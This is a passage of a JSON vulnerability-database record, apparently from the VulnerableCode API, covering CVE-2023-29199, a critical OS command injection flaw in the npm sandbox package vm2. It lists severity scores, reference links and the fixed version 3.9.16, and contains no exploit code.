e.io/vulnerabilities/VCID-zeup-86es-xkc4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44952?format=json","vulnerability_id":"VCID-zz97-v3rg-1bck","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in vm2.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29199.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29199.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29199","reference_id":"","reference_type":"","scores":[{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96275","published_at":"2026-06-05T12:55:00Z"},{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96283","published_at":"2026-06-09T12:55:00Z"},{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96279","published_at":"2026-06-08T12:55:00Z"},{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96278","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29199"},{"reference_url":"https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL
","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/24c724daa7c09f003e556d7cd1c7a8381cb985d7","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/commit/24c724daa7c09f003e556d7cd1c7a8381cb985d7"},{"reference_url":"https://github.com/patriksimek/vm2/issues/516","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/issues/516"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.16","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.16"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29199","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29199"},{"reference
_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187409","reference_id":"2187409","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187409"},{"reference_url":"https://github.com/advisories/GHSA-xj72-wvfv-8985","reference_id":"GHSA-xj72-wvfv-8985","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xj72-wvfv-8985"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-xj72-wvfv-8985","reference_id":"GHSA-xj72-wvfv-8985","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-xj72-wvfv-8985"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64717?format=json","purl":"pkg:npm/vm2@3.9.16","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew
-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.16"}],"aliases":["CVE-2023-29199","GHSA-xj72-wvfv-8985"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zz97-v3rg-1bck"}],"fixing_vulnerabilities":[],"risk_score":"10.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@2.0.0"}